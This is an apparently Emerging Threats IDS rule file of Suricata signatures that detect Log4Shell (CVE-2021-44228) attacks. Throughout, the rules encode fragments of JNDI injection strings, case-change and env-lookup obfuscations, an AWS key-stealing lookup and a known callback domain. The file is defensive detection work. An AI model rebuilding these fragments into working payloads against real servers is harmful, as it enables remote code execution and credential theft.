alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034712; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034713; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034714; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034715; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034716; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (CVE-2021-44228)"; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034717; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response"; flow:established,to_client; content:"|30 81|"; startswith; content:"|02 01|"; distance:1; within:2; content:"|64|"; distance:1; within:1; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0d|javaClassName"; within:20; fast_pattern; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0c|javaCodeBase"; within:19; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0b|objectClass"; within:18; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0b|javaFactory"; within:18; reference:url,ldap.com/ldapv3-wire-protocol-reference-ldap-result/; reference:url,ldap.com/ldapv3-wire-protocol-reference-search/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034722; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, former_category ATTACK_RESPONSE, signature_severity Major, updated_at 2021_12_14;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Payload Domain (rce .ee)"; dns.query; dotprefix; content:".rce.ee"; nocase; endswith; reference:url,www.fastly.com/blog/new-data-and-insights-into-log4shell-attacks-cve-2021-44228; reference:cve,2021-44228; classtype:domain-c2; sid:2034747; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, signature_severity Major, updated_at 2021_12_17;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228)"; flow:established,to_server; stream_size:client,<,10000; content:"|24 7b|"; content:"|24 7b 3a 3a|"; distance:0; within:300; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034673; rev:2; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern;  reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034757; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (Outbound)  (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern;  reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034758; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern;  reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034759; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern;  reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034760; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern;  reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034761; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern;  reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034762; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034763; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034764; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern;  reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034765; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern;  reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034766; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034767; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034768; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|env|3a|NaN|3a|-j|7d|ndi|24 7b|env|3a|NaN|3a|"; nocase; fast_pattern; content:"|24 7b|env|3a|NaN|3a|-l|7d|dap|24|"; reference:url,twitter.com/bad_packets/status/1471253695459332102; reference:cve,2021-44228; classtype:attempted-admin; sid:2034755; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (Outbound) (CVE-2021-44228) "; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034750; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034751; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%24)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034781; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (Outbound) (CVE-2021-44228)"; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034782; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; distance:0; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034783; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; distance:0; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034784; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034785; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034787; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034788; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034789; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034790; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (Outbound) (CVE-2021-44228) "; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034791; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034792; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034793; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034794; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (Outbound) (CVE-2021-44228)"; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034795; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034796; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (Outbound) (CVE-2021-44228)"; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034797; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034798; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034799; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034800; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034801; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_18;)
alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034802; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_18;)
alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034803; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_18;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/17 Obfuscation Observed (Outbound) (CVE-2021-44228)"; content:"%7b"; nocase; fast_pattern; pcre:"/^(j|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)j(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-j(\x7d|%7d))(n|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)n(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-n(\x7d|%7d))/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034804; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17 Obfuscation Observed M2 (Outbound) (CVE-2021-44228)"; content:"|24 7b|"; content:"|24 7b 3a 3a|"; distance:0; within:300; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034805; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17 Obfuscation Observed (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034806; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|AWS_ACCESS_KEY_ID"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034807; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17 Obfuscation Observed M2 (Outbound) (CVE-2021-44228)"; flow:established,to_server; stream_size:client,<,10000; content:"|24 7b|"; content:"|24 7b 3a 3a|"; distance:0; within:300; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034786; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;)
